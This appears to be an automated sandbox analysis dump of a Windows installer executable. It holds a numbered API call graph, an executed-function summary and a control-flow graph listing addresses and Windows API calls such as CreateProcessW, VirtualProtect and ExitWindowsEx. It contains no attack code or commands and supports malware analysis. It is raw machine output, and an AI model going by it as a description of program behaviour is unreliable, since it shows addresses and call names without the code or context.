4828->4829 4830 402123 4829->4830 4831 402c37 17 API calls 4830->4831 4832 40212d 4831->4832 4833 40216c CoCreateInstance 4832->4833 4834 402c37 17 API calls 4832->4834 4837 40218b 4833->4837 4834->4833 4835 401423 24 API calls 4836 40224a 4835->4836 4837->4835 4837->4836 5166 4019ff 5167 402c37 17 API calls 5166->5167 5168 401a06 5167->5168 5169 402c37 17 API calls 5168->5169 5170 401a0f 5169->5170 5171 401a16 lstrcmpiW 5170->5171 5172 401a28 lstrcmpW 5170->5172 5173 401a1c 5171->5173 5172->5173 3722 401f00 3737 402c37 3722->3737 3729 401f39 CloseHandle 3733 402885 3729->3733 3732 401f2b 3734 401f30 3732->3734 3735 401f3b 3732->3735 3762 4061c9 wsprintfW 3734->3762 3735->3729 3738 402c43 3737->3738 3763 4062a4 3738->3763 3741 401f06 3743 4052e6 3741->3743 3744 405301 3743->3744 3752 401f10 3743->3752 3745 40531d lstrlenW 3744->3745 3746 4062a4 17 API calls 3744->3746 3747 405346 3745->3747 3748 40532b lstrlenW 3745->3748 3746->3745 3749 405359 3747->3749 3750 40534c SetWindowTextW 3747->3750 3751 40533d lstrcatW 3748->3751 3748->3752 3749->3752 3753 40535f SendMessageW SendMessageW SendMessageW 3749->3753 3750->3749 3751->3747 3754 405867 CreateProcessW 3752->3754 3753->3752 3755 401f16 3754->3755 3756 40589a CloseHandle 3754->3756 3755->3729 3755->3733 3757 40670d WaitForSingleObject 3755->3757 3756->3755 3758 406727 3757->3758 3759 406739 GetExitCodeProcess 3758->3759 3805 406698 3758->3805 3759->3732 3762->3729 3778 4062b1 3763->3778 3764 4064fc 3765 402c64 3764->3765 3796 406282 lstrcpynW 3764->3796 3765->3741 3780 406516 3765->3780 3767 4064ca lstrlenW 3767->3778 3770 4062a4 10 API calls 3770->3767 3772 4063df GetSystemDirectoryW 3772->3778 3773 4063f2 GetWindowsDirectoryW 3773->3778 3774 406516 5 API calls 3774->3778 3775 406426 SHGetSpecialFolderLocation 3775->3778 3779 40643e SHGetPathFromIDListW CoTaskMemFree 3775->3779 3776 4062a4 10 API calls 3776->3778 3777 40646d lstrcatW 3777->3778 3778->3764 3778->3767 3778->3770 3778->3772 3778->3773 3778->3774 3778->3775 3778->3776 3778->3777 3789 406150 3778->3789 3794 4061c9 wsprintfW 3778->3794 3795 406282 lstrcpynW 3778->3795 3779->3778 3786 406523 3780->3786 3781 406599 3782 40659e CharPrevW 3781->3782 3784 4065bf 3781->3784 3782->3781 3783 40658c CharNextW 3783->3781 3783->3786 3784->3741 3786->3781 3786->3783 3787 406578 CharNextW 3786->3787 3788 406587 CharNextW 3786->3788 3801 405b80 3786->3801 3787->3786 3788->3783 3797 4060ef 3789->3797 3792 4061b4 3792->3778 3793 406184 RegQueryValueExW RegCloseKey 3793->3792 3794->3778 3795->3778 3796->3765 3798 4060fe 3797->3798 3799 406102 3798->3799 3800 406107 RegOpenKeyExW 3798->3800 3799->3792 3799->3793 3800->3799 3802 405b86 3801->3802 3803 405b9c 3802->3803 3804 405b8d CharNextW 3802->3804 3803->3786 3804->3802 3806 4066b5 PeekMessageW 3805->3806 3807 4066c5 WaitForSingleObject 3806->3807 3808 4066ab DispatchMessageW 3806->3808 3807->3758 3808->3806 3983 100027c2 3984 10002812 3983->3984 3985 100027d2 VirtualProtect 3983->3985 3985->3984 5174 402003 5175 402012 5174->5175 5176 40200c 5174->5176 5177 402020 5175->5177 5202 4061c9 wsprintfW 5175->5202 5201 4061c9 wsprintfW 5176->5201 5180 4020f0 5177->5180 5181 402c37 17 API calls 5177->5181 5183 401423 24 API calls 5180->5183 5182 402045 5181->5182 5184 402c37 17 API calls 5182->5184 5188 40224a 5183->5188 5185 40204e 5184->5185 5186 402064 LoadLibraryExW 5185->5186 5187 402056 GetModuleHandleW 5185->5187 5186->5180 5189 402075 5186->5189 5187->5186 5187->5189 5190 4066cb 2 API calls 5189->5190 5191 402080 5190->5191 5192 402086 5191->5192 5193 4020bf 5191->5193 5194 4020a5 5192->5194 5195 40208e 5192->5195 5196 4052e6 24 API calls 5193->5196 5200 10001759 50 API calls 5194->5200 5197 401423 24 API calls 5195->5197 5198 402096 5196->5198 5197->5198 5198->5188 5199 4020e2 FreeLibrary 5198->5199 5199->5188 5200->5198 5201->5175 5202->5177 5203 401503 5204 40150b 5203->5204 5206 40151e 5203->5206 5205 402c15 17 API calls 5204->5205 5205->5206 3997 402306 3998 402314 3997->3998 3999 40230e 3997->3999 4001 402322 3998->4001 4002 402c37 17 API calls 3998->4002 4000 402c37 17 API calls 3999->4000 4000->3998 4003 402330 4001->4003 4004 402c37 17 API calls 4001->4004 4002->4001 4005 402c37 17 API calls 4003->4005 4004->4003 4006 402339 WritePrivateProfileStringW 4005->4006 4014 402388 4015 402390 4014->4015 4016 4023bb 4014->4016 4026 402c77 4015->4026 4018 402c37 17 API calls 4016->4018 4020 4023c2 4018->4020 4031 402cf5 4020->4031 4021 4023a1 4023 402c37 17 API calls 4021->4023 4025 4023a8 RegDeleteValueW RegCloseKey 4023->4025 4024 4023cf 4025->4024 4027 402c37 17 API calls 4026->4027 4028 402c8e 4027->4028 4029 4060ef RegOpenKeyExW 4028->4029 4030 402397 4029->4030 4030->4021 4030->4024 4032 402d0b 4031->4032 4033 402d21 4032->4033 4035 402d2a 4032->4035 4033->4024 4036 4060ef RegOpenKeyExW 4035->4036 4037 402d58 4036->4037 4038 402dd0 4037->4038 4043 402d5c 4037->4043 4038->4033 4039 402d7e RegEnumKeyW 4040 402d95 RegCloseKey 4039->4040 4039->4043 4041 40665c 5 API calls 4040->4041 4045 402da5 4041->4045 4042 402db6 RegCloseKey 4042->4038 4043->4039 4043->4040 4043->4042 4044 402d2a 6 API calls 4043->4044 4044->4043 4046 402dc4 RegDeleteKeyW 4045->4046 4047 402da9 4045->4047 4046->4038 4047->4038 5207 40100b DefWindowProcW 5208 401179 5207->5208 5209 40190c 5210 401943 5209->5210 5211 402c37 17 API calls 5210->5211 5212 401948 5211->5212 5213 405990 67 API calls 5212->5213 5214 401951 5213->5214 5215 401d0e 5216 402c15 17 API calls 5215->5216 5217 401d15 5216->5217 5218 402c15 17 API calls 5217->5218 5219 401d21 GetDlgItem 5218->5219 5220 40258c 5219->5220 5221 1000164f 5222 10001516 GlobalFree 5221->5222 5223 10001667 5222->5223 5224 100016ad GlobalFree 5223->5224 5225 10001682 5223->5225 5226 10001699 VirtualFree 5223->5226 5225->5224 5226->5224 5227 40190f 5228 402c37 17 API calls 5227->5228 5229 401916 5228->5229 5230 4058e4 MessageBoxIndirectW 5229->5230 5231 40191f 5230->5231 5232 401491 5233 4052e6 24 API calls 5232->5233 5234 401498 5233->5234 5235 402592 5236 4025c1 5235->5236 5237 4025a6 5235->5237 5239 4025f5 5236->5239 5240 4025c6 5236->5240 5238 402c15 17 API calls 5237->5238 5247 4025ad 5238->5247 5242 402c37 17 API calls 5239->5242 5241 402c37 17 API calls 5240->5241 5243 4025cd WideCharToMultiByte lstrlenA 5241->5243 5244 4025fc lstrlenW 5242->5244 5243->5247 5244->5247 5245 402629 5246 40263f 5245->5246 5248 405e26 WriteFile 5245->5248 5247->5245 5247->5246 5249 405e55 5 API calls 5247->5249 5248->5246 5249->5245 5250 404814 CoTaskMemFree 5251 405b53 3 API calls 5250->5251 5252 404827 5251->5252 5253 40485e SetDlgItemTextW 5252->5253 5255 4062a4 17 API calls 5252->5255 5254 404879 5253->5254 5287 404a21 5254->5287 5289 4058c8 GetDlgItemTextW 5254->5289 5256 404846 lstrcmpiW 5255->5256 5256->5253 5258 404857 lstrcatW 5256->5258 5258->5253 5259 4048a2 5262 405c5b 18 API calls 5259->5262 5260 40427e 8 API calls 5261 404a35 5260->5261 5263 4048a8 5262->5263 5290 406282 lstrcpynW 5263->5290 5265 4048bf 5266 40665c 5 API calls 5265->5266 5270 4048c6 5266->5270 5267 404907 5291 406282 lstrcpynW 5267->5291 5269 40490e 5271 405bfe 4 API calls 5269->5271 5270->5267 5275 405b9f 2 API calls 5270->5275 5276 40495f 5270->5276 5272 404914 GetDiskFreeSpaceW 5271->5272 5274 404938 MulDiv 5272->5274 5272->5276 5274->5276 5275->5270 5277 404b6b 20 API calls 5276->5277 5286 4049d0 5276->5286 5280 4049bd 5277->5280 5278 40140b 2 API calls 5279 4049f3 5278->5279 5292 404239 KiUserCallbackDispatcher 5279->5292 5282 4049d2 SetDlgItemTextW 5280->5282 5283 4049c2 5280->5283 5282->5286 5285 404aa2 20 API calls 5283->5285 5284 404a0f 5284->5287 5288 40463f SendMessageW 5284->5288 5285->5286 5286->5278 5286->5279 5287->5260 5288->5287 5289->5259 5290->5265 5291->5269 5292->5284 5293 10001058 5295 10001074 5293->5295 5294 100010dd 5295->5294 5296 10001092 5295->5296 5297 10001516 GlobalFree 5295->5297 5298 10001516 GlobalFree 5296->5298 5297->5296 5299 100010a2 5298->5299 5300 100010b2 5299->5300 5301 100010a9 GlobalSize 5299->5301 5302 100010b6 GlobalAlloc 5300->5302 5303 100010c7 5300->5303 5301->5300 5304 1000153d 3 API calls 5302->5304 5305 100010d2 GlobalFree 5303->5305 5304->5303 5305->5294 4071 401c19 4072 402c15 17 API calls 4071->4072 4073 401c20 4072->4073 4074 402c15 17 API calls 4073->4074 4075 401c2d 4074->4075 4076 401c42 4075->4076 4078 402c37 17 API calls 4075->4078 4077 401c52 4076->4077 4079 402c37 17 API calls 4076->4079 4080 401ca9 4077->4080 4081 401c5d 4077->4081 4078->4076 4079->4077 4083 402c37 17 API calls 4080->4083 4082 402c15 17 API calls 4081->4082 4084 401c62 4082->4084 4085 401cae 4083->4085 4087 402c15 17 API calls 4084->4087 4086 402c37 17 API calls 4085->4086 4088 401cb7 FindWindowExW 4086->4088 4089 401c6e 4087->4089 4092 401cd9 4088->4092 4090 401c99 SendMessageW 4089->4090 4091 401c7b SendMessageTimeoutW 4089->4091 4090->4092 4091->4092 5306 402a9a SendMessageW 5307 402ab4 InvalidateRect 5306->5307 5308 402abf 5306->5308 5307->5308 5309 40281b 5310 402821 5309->5310 5311 402829 FindClose 5310->5311 5312 402abf 5310->5312 5311->5312 5313 40149e 5314 4022f1 5313->5314 5315 4014ac PostQuitMessage 5313->5315 5315->5314 5316 100010e1 5325 10001111 5316->5325 5317 100011d8 GlobalFree 5318 100012ba 2 API calls 5318->5325 5319 100011d3 5319->5317 5320 10001272 2 API calls 5323 100011c4 GlobalFree 5320->5323 5321 10001164 GlobalAlloc 5321->5325 5322 100011f8 GlobalFree 5322->5325 5323->5325 5324 100012e1 lstrcpyW 5324->5325 5325->5317 5325->5318 5325->5319 5325->5320 5325->5321 5325->5322 5325->5323 5325->5324 5326 4015a3 5327 402c37 17 API calls 5326->5327 5328 4015aa SetFileAttributesW 5327->5328 5329 4015bc 5328->5329 5330 4046a4 5331 4046c1 SetDlgItemTextW 5330->5331 5332 4046ad 5330->5332 5333 4046d5 5331->5333 5332->5333 5334 404217 18 API calls 5332->5334 5335 40427e 8 API calls 5333->5335 5336 4046bc 5334->5336 5337 4046e1 5335->5337 5336->5331 4162 405425 4163 405446 GetDlgItem GetDlgItem GetDlgItem 4162->4163 4164 4055cf 4162->4164 4208 40424c SendMessageW 4163->4208 4166 405600 4164->4166 4167 4055d8 GetDlgItem CreateThread CloseHandle 4164->4167 4169 40562b 4166->4169 4170 405650 4166->4170 4171 405617 ShowWindow ShowWindow 4166->4171 4167->4166 4231 4053b9 OleInitialize 4167->4231 4168 4054b6 4174 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 4168->4174 4172 405637 4169->4172 4173 40568b 4169->4173 4217 40427e 4170->4217 4213 40424c SendMessageW 4171->4213 4176 405665 ShowWindow 4172->4176 4177 40563f 4172->4177 4173->4170 4181 405699 SendMessageW 4173->4181 4179 40552b 4174->4179 4180 40550f SendMessageW SendMessageW 4174->4180 4184 405685 4176->4184 4185 405677 4176->4185 4214 4041f0 4177->4214 4188 405530 SendMessageW 4179->4188 4189 40553e 4179->4189 4180->4179 4183 40565e 4181->4183 4190 4056b2 CreatePopupMenu 4181->4190 4187 4041f0 SendMessageW 4184->4187 4186 4052e6 24 API calls 4185->4186 4186->4184 4187->4173 4188->4189 4209 404217 4189->4209 4191 4062a4 17 API calls 4190->4191 4193 4056c2 AppendMenuW 4191->4193 4195 4056f2 TrackPopupMenu 4193->4195 4196 4056df GetWindowRect 4193->4196 4194 40554e 4197 405557 ShowWindow 4194->4197 4198 40558b GetDlgItem SendMessageW 4194->4198 4195->4183 4200 40570d 4195->4200 4196->4195 4201 40557a 4197->4201 4202 40556d ShowWindow 4197->4202 4198->4183 4199 4055b2 SendMessageW SendMessageW 4198->4199 4199->4183 4203 405729 SendMessageW 4200->4203 4212 40424c SendMessageW 4201->4212 4202->4201 4203->4203 4204 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4203->4204 4206 40576b SendMessageW 4204->4206 4206->4206 4207 405794 GlobalUnlock SetClipboardData CloseClipboard 4206->4207 4207->4183 4208->4168 4210 4062a4 17 API calls 4209->4210 4211 404222 SetDlgItemTextW 4210->4211 4211->4194 4212->4198 4213->4169 4215 4041f7 4214->4215 4216 4041fd SendMessageW 4214->4216 4215->4216 4216->4170 4218 404296 GetWindowLongW 4217->4218 4228 40431f 4217->4228 4219 4042a7 4218->4219 4218->4228 4220 4042b6 GetSysColor 4219->4220 4221 4042b9 4219->4221 4220->4221 4222 4042c9 SetBkMode 4221->4222 4223 4042bf SetTextColor 4221->4223 4224 4042e1 GetSysColor 4222->4224 4225 4042e7 4222->4225 4223->4222 4224->4225 4226 4042f8 4225->4226 4227 4042ee SetBkColor 4225->4227 4226->4228 4229 404312 CreateBrushIndirect 4226->4229 4230 40430b DeleteObject 4226->4230 4227->4226 4228->4183 4229->4228 4230->4229 4238 404263 4231->4238 4233 404263 SendMessageW 4235 405415 OleUninitialize 4233->4235 4234 4053dc 4237 405403 4234->4237 4241 401389 4234->4241 4237->4233 4239 40427b 4238->4239 4240 40426c SendMessageW 4238->4240 4239->4234 4240->4239 4243 401390 4241->4243 4242 4013fe 4242->4234 4243->4242 4244 4013cb MulDiv SendMessageW 4243->4244 4244->4243 4245 4058aa ShellExecuteExW 4246 40202c 4247 40203e 4246->4247 4257 4020f0 4246->4257 4248 402c37 17 API calls 4247->4248 4249 402045 4248->4249 4251 402c37 17 API calls 4249->4251 4250 401423 24 API calls 4255 40224a 4250->4255 4252 40204e 4251->4252 4253 402064 LoadLibraryExW 4252->4253 4254 402056 GetModuleHandleW 4252->4254 4256 402075 4253->4256 4253->4257 4254->4253 4254->4256 4269 4066cb WideCharToMultiByte 4256->4269 4257->4250 4260 402086 4262 4020a5 4260->4262 4263 40208e 4260->4263 4261 4020bf 4264 4052e6 24 API calls 4261->4264 4272 10001759 4262->4272 4265 401423 24 API calls 4263->4265 4266 402096 4264->4266 4265->4266 4266->4255 4267 4020e2 FreeLibrary 4266->4267 4267->4255 4270 4066f5 GetProcAddress 4269->4270 4271 402080 4269->4271 4270->4271 4271->4260 4271->4261 4273 10001789 4272->4273 4314 10001b18 4273->4314 4275 10001790 4276 100018a6 4275->4276 4277 100017a1 4275->4277 4278 100017a8 4275->4278 4276->4266 4362 10002286 4277->4362 4346 100022d0 4278->4346 4283 1000180c 4287 10001812 4283->4287 4288 1000184e 4283->4288 4284 100017ee 4375 100024a4 4284->4375 4285 100017d7 4298 100017cd 4285->4298 4372 10002b57 4285->4372 4286 100017be 4290 100017c4 4286->4290 4291 100017cf 4286->4291 4293 100015b4 3 API calls 4287->4293 4295 100024a4 10 API calls 4288->4295 4290->4298 4356 1000289c 4290->4356 4366 10002640 4291->4366 4300 10001828 4293->4300 4301 10001840 4295->4301 4296 100017f4 4386 100015b4 4296->4386 4298->4283 4298->4284 4304 100024a4 10 API calls 4300->4304 4306 10001895 4301->4306 4397 10002467 4301->4397 4303 100017d5 4303->4298 4304->4301 4306->4276 4308 1000189f GlobalFree 4306->4308 4308->4276 4311 10001881 4311->4306 4401 1000153d wsprintfW 4311->4401 4312 1000187a FreeLibrary 4312->4311 4404 1000121b GlobalAlloc 4314->4404 4316 10001b3c 4405 1000121b GlobalAlloc 4316->4405 4318 10001d7a GlobalFree GlobalFree GlobalFree 4320 10001d97 4318->4320 4334 10001de1 4318->4334 4319 10001b47 4319->4318 4323 10001c1d GlobalAlloc 4319->4323 4325 10001c68 lstrcpyW 4319->4325 4326 10001c86 GlobalFree 4319->4326 4329 10001c72 lstrcpyW 4319->4329 4319->4334 4336 10002048 4319->4336 4340 10001cc4 4319->4340 4341 10001f37 GlobalFree 4319->4341 4343 1000122c 2 API calls 4319->4343 4411 1000121b GlobalAlloc 4319->4411 4321 10001dac 4320->4321 4322 100020ee 4320->4322 4320->4334 4321->4334 4408 1000122c 4321->4408 4324 10002110 GetModuleHandleW 4322->4324 4322->4334 4323->4319 4327 10002121 LoadLibraryW 4324->4327 4328 10002136 4324->4328 4325->4329 4326->4319 4327->4328 4327->4334 4412 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4328->4412 4329->4319 4331 10002188 4333 10002195 lstrlenW 4331->4333 4331->4334 4413 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4333->4413 4334->4275 4335 10002148 4335->4331 4345 10002172 GetProcAddress 4335->4345 4336->4334 4339 10002090 lstrcpyW 4336->4339 4339->4334 4340->4319 4406 1000158f GlobalSize GlobalAlloc 4340->4406 4341->4319 4342 100021af 4342->4334 4343->4319 4345->4331 4353 100022e8 4346->4353 4347 1000122c GlobalAlloc lstrcpynW 4347->4353 4349 10002410 GlobalFree 4350 100017ae 4349->4350 4349->4353 4350->4285 4350->4286 4350->4298 4351 100023ba GlobalAlloc CLSIDFromString 4351->4349 4352 1000238f GlobalAlloc WideCharToMultiByte 4352->4349 4353->4347 4353->4349 4353->4351 4353->4352 4355 100023d9 4353->4355 4415 100012ba 4353->4415 4355->4349 4419 100025d4 4355->4419 4358 100028ae 4356->4358 4357 10002953 CreateFileA 4359 10002971 4357->4359 4358->4357 4360 10002a62 GetLastError 4359->4360 4361 10002a6d 4359->4361 4360->4361 4361->4298 4363 10002296 4362->4363 4364 100017a7 4362->4364 4363->4364 4365 100022a8 GlobalAlloc 4363->4365 4364->4278 4365->4363 4369 1000265c 4366->4369 4367 100026c0 4370 100026c5 GlobalSize 4367->4370 4371 100026cf 4367->4371 4368 100026ad GlobalAlloc 4368->4371 4369->4367 4369->4368 4370->4371 4371->4303 4373 10002b62 4372->4373 4374 10002ba2 GlobalFree 4373->4374 4422 1000121b GlobalAlloc 4375->4422 4377 100024ae 4378 10002506 MultiByteToWideChar 4377->4378 4379 1000252b StringFromGUID2 4377->4379 4380 1000253c lstrcpynW 4377->4380 4381 1000254f wsprintfW 4377->4381 4382 1000256c GlobalFree 4377->4382 4383 100025a7 GlobalFree 4377->4383 4384 10001272 2 API calls 4377->4384 4423 100012e1 4377->4423 4378->4377 4379->4377 4380->4377 4381->4377 4382->4377 4383->4296 4384->4377 4427 1000121b GlobalAlloc 4386->4427 4388 100015ba 4389 100015c7 lstrcpyW 4388->4389 4390 100015e1 4388->4390 4393 100015fb 4389->4393 4392 100015e6 wsprintfW 4390->4392 4390->4393 4392->4393 4394 10001272 4393->4394 4395 100012b5 GlobalFree 4394->4395 4396 1000127b GlobalAlloc lstrcpynW 4394->4396 4395->4301 4396->4395 4398 10001861 4397->4398 4399 10002475 4397->4399 4398->4311 4398->4312 4399->4398 4400 10002491 GlobalFree 4399->4400 4400->4399 4402 10001272 2 API calls 4401->4402 4403 1000155e 4402->4403 4403->4306 4404->4316 4405->4319 4407 100015ad 4406->4407 4407->4340 4414 1000121b GlobalAlloc 4408->4414 4410 1000123b lstrcpynW 4410->4334 4411->4319 4412->4335 4413->4342 4414->4410 4416 100012c1 4415->4416 4417 1000122c 2 API calls 4416->4417 4418 100012df 4417->4418 4418->4353 4420 100025e2 VirtualAlloc 4419->4420 4421 10002638 4419->4421 4420->4421 4421->4355 4422->4377 4424 100012ea 4423->4424 4425 1000130c 4423->4425 4424->4425 4426 100012f0 lstrcpyW 4424->4426 4425->4377 4426->4425 4427->4388 5338 402a2f 5339 402c15 17 API calls 5338->5339 5340 402a35 5339->5340 5341 402a6c 5340->5341 5342 402885 5340->5342 5344 402a47 5340->5344 5341->5342 5343 4062a4 17 API calls 5341->5343 5343->5342 5344->5342 5346 4061c9 wsprintfW 5344->5346 5346->5342 5347 401a30 5348 402c37 17 API calls 5347->5348 5349 401a39 ExpandEnvironmentStringsW 5348->5349 5350 401a4d 5349->5350 5352 401a60 5349->5352 5351 401a52 lstrcmpW 5350->5351 5350->5352 5351->5352 5358 4043b4 5359 4043cc 5358->5359 5363 4044e6 5358->5363 5364 404217 18 API calls 5359->5364 5360 404550 5361 40461a 5360->5361 5362 40455a GetDlgItem 5360->5362 5369 40427e 8 API calls 5361->5369 5365 404574 5362->5365 5366 4045db 5362->5366 5363->5360 5363->5361 5367 404521 GetDlgItem SendMessageW 5363->5367 5368 404433 5364->5368 5365->5366 5372 40459a SendMessageW LoadCursorW SetCursor 5365->5372 5366->5361 5373 4045ed 5366->5373 5391 404239 KiUserCallbackDispatcher 5367->5391 5371 404217 18 API calls 5368->5371 5379 404615 5369->5379 5377 404440 CheckDlgButton 5371->5377 5392 404663 5372->5392 5374 404603 5373->5374 5375 4045f3 SendMessageW 5373->5375 5374->5379 5380 404609 SendMessageW 5374->5380 5375->5374 5376 40454b 5381 40463f SendMessageW 5376->5381 5389 404239 KiUserCallbackDispatcher 5377->5389 5380->5379 5381->5360 5384 40445e GetDlgItem 5390 40424c SendMessageW 5384->5390 5386 404474 SendMessageW 5387 404491 GetSysColor 5386->5387 5388 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5386->5388 5387->5388 5388->5379 5389->5384 5390->5386 5391->5376 5395 4058aa ShellExecuteExW 5392->5395 5394 4045c9 LoadCursorW SetCursor 5394->5366 5395->5394 4715 401735 4716 402c37 17 API calls 4715->4716 4717 40173c SearchPathW 4716->4717 4718 401757 4717->4718 4720 4029e0 4717->4720 4718->4720 4721 406282 lstrcpynW 4718->4721 4721->4720 5396 402835 5397 40283d 5396->5397 5398 402841 FindNextFileW 5397->5398 5400 402853 5397->5400 5398->5400 5399 4029e0 5400->5399 5402 406282 lstrcpynW 5400->5402 5402->5399 5403 10002a77 5404 10002a8f 5403->5404 5405 1000158f 2 API calls 5404->5405 5406 10002aaa 5405->5406 5407 4014b8 5408 4014be 5407->5408 5409 401389 2 API calls 5408->5409 5410 4014c6 5409->5410 5411 404a3c 5412 404a68 5411->5412 5413 404a4c 5411->5413 5415 404a9b 5412->5415 5416 404a6e SHGetPathFromIDListW 5412->5416 5422 4058c8 GetDlgItemTextW 5413->5422 5417 404a85 SendMessageW 5416->5417 5418 404a7e 5416->5418 5417->5415 5420 40140b 2 API calls 5418->5420 5419 404a59 SendMessageW 5419->5412 5420->5417 5422->5419 4748 403d3e 4749 403e91 4748->4749 4750 403d56 4748->4750 4751 403ea2 GetDlgItem GetDlgItem 4749->4751 4752 403ee2 4749->4752 4750->4749 4753 403d62 4750->4753 4756 404217 18 API calls 4751->4756 4757 403f3c 4752->4757 4765 401389 2 API calls 4752->4765 4754 403d80 4753->4754 4755 403d6d SetWindowPos 4753->4755 4758 403d85 ShowWindow 4754->4758 4759 403d9d 4754->4759 4755->4754 4760 403ecc SetClassLongW 4756->4760 4761 404263 SendMessageW 4757->4761 4779 403e8c 4757->4779 4758->4759 4762 403da5 DestroyWindow 4759->4762 4763 403dbf 4759->4763 4764 40140b 2 API calls 4760->4764 4787 403f4e 4761->4787 4818 4041a0 4762->4818 4766 403dc4 SetWindowLongW 4763->4766 4767 403dd5 4763->4767 4764->4752 4768 403f14 4765->4768 4766->4779 4771 403de1 GetDlgItem 4767->4771 4772 403e7e 4767->4772 4768->4757 4773 403f18 SendMessageW 4768->4773 4769 40140b 2 API calls 4769->4787 4770 4041a2 DestroyWindow EndDialog 4770->4818 4775 403e11 4771->4775 4776 403df4 SendMessageW IsWindowEnabled 4771->4776 4777 40427e 8 API calls 4772->4777 4773->4779 4774 4041d1 ShowWindow 4774->4779 4780 403e1e 4775->4780 4781 403e31 4775->4781 4782 403e65 SendMessageW 4775->4782 4791 403e16 4775->4791 4776->4775 4776->4779 4777->4779 4778 4062a4 17 API calls 4778->4787 4780->4782 4780->4791 4784 403e39 4781->4784 4785 403e4e 4781->4785 4782->4772 4783 4041f0 SendMessageW 4786 403e4c 4783->4786 4788 40140b 2 API calls 4784->4788 4789 40140b 2 API calls 4785->4789 4786->4772 4787->4769 4787->4770 4787->4778 4787->4779 4790 404217 18 API calls 4787->4790 4793 404217 18 API calls 4787->4793 4809 4040e2 DestroyWindow 4787->4809 4788->4791 4792 403e55 4789->4792 4790->4787 4791->4783 4792->4772 4792->4791 4794 403fc9 GetDlgItem 4793->4794 4795 403fe6 ShowWindow KiUserCallbackDispatcher 4794->4795 4796 403fde 4794->4796 4819 404239 KiUserCallbackDispatcher 4795->4819 4796->4795 4798 404010 EnableWindow 4803 404024 4798->4803 4799 404029 GetSystemMenu EnableMenuItem SendMessageW 4800 404059 SendMessageW 4799->4800 4799->4803 4800->4803 4802 403d1f 18 API calls 4802->4803 4803->4799 4803->4802 4820 40424c SendMessageW 4803->4820 4821 406282 lstrcpynW 4803->4821 4805 404088 lstrlenW 4806 4062a4 17 API calls 4805->4806 4807 40409e SetWindowTextW 4806->4807 4808 401389 2 API calls 4807->4808 4808->4787 4810 4040fc CreateDialogParamW 4809->4810 4809->4818 4811 40412f 4810->4811 4810->4818 4812 404217 18 API calls 4811->4812 4813 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4812->4813 4814 401389 2 API calls 4813->4814 4815 404180 4814->4815 4815->4779 4816 404188 ShowWindow 4815->4816 4817 404263 SendMessageW 4816->4817 4817->4818 4818->4774 4818->4779 4819->4798 4820->4803 4821->4805

                                                                                      Executed Functions

                                                                                      Function 00403373 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 412stringfilecomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 7 4033bc 1->7 4 4033c8-4033dc call 4065ec lstrlenA 2->4 9 4033de-4033fa call 40665c * 3 4->9 7->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 21 403404 17->21 21->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 38 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->38 39 403619-403633 DeleteFileW call 402ec1 29->39 33 4034b0-4034b4 31->33 34 4034ab-4034af 31->34 32->31 32->32 36 403573-403580 call 405b80 33->36 37 4034ba-4034c0 33->37 34->33 52 403582-403583 36->52 53 403584-40358a 36->53 41 4034c2-4034ca 37->41 42 4034db-403514 37->42 38->39 58 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 38->58 54 4036e4-4036f4 call 4038b6 OleUninitialize 39->54 55 403639-40363f 39->55 47 4034d1 41->47 48 4034cc-4034cf 41->48 49 403531-40356b 42->49 50 403516-40351b 42->50 47->42 48->42 48->47 49->36 57 40356d-403571 49->57 50->49 56 40351d-403525 50->56 52->53 53->28 59 403590 53->59 75 40381a-403820 54->75 76 4036fa-40370a call 4058e4 ExitProcess 54->76 60 4036d4-4036db call 403990 55->60 61 403645-403650 call 405b80 55->61 63 403527-40352a 56->63 64 40352c 56->64 57->36 65 403592-4035a0 call 406282 57->65 58->39 58->54 67 4035a5 59->67 74 4036e0 60->74 79 403652-403687 61->79 80 40369e-4036a8 61->80 63->49 63->64 64->49 65->67 67->29 74->54 77 403822-403838 GetCurrentProcess OpenProcessToken 75->77 78 40389e-4038a6 75->78 82 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 40386e-40387c call 40665c 77->83 85 4038a8 78->85 86 4038ac-4038b0 ExitProcess 78->86 84 403689-40368d 79->84 87 403710-403724 call 40584f lstrcatW 80->87 88 4036aa-4036b8 call 405c5b 80->88 82->83 102 40388a-403895 ExitWindowsEx 83->102 103 40387e-403888 83->103 91 403696-40369a 84->91 92 40368f-403694 84->92 85->86 100 403731-40374b lstrcatW lstrcmpiW 87->100 101 403726-40372c lstrcatW 87->101 88->54 99 4036ba-4036d0 call 406282 * 2 88->99 91->84 97 40369c 91->97 92->91 92->97 97->80 99->60 100->54 105 40374d-403750 100->105 101->100 102->78 106 403897-403899 call 40140b 102->106 103->102 103->106 108 403752-403757 call 4057b5 105->108 109 403759 call 405832 105->109 106->78 117 40375e-40376c SetCurrentDirectoryW 108->117 109->117 118 403779-4037a2 call 406282 117->118 119 40376e-403774 call 406282 117->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 129 40380e-403815 call 406048 126->129 127->126 128 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->128 128->126 138 4037f9-403800 CloseHandle 128->138 129->54 138->126
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 00403396
                                                                                      • GetVersion.KERNEL32 ref: 0040339C
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
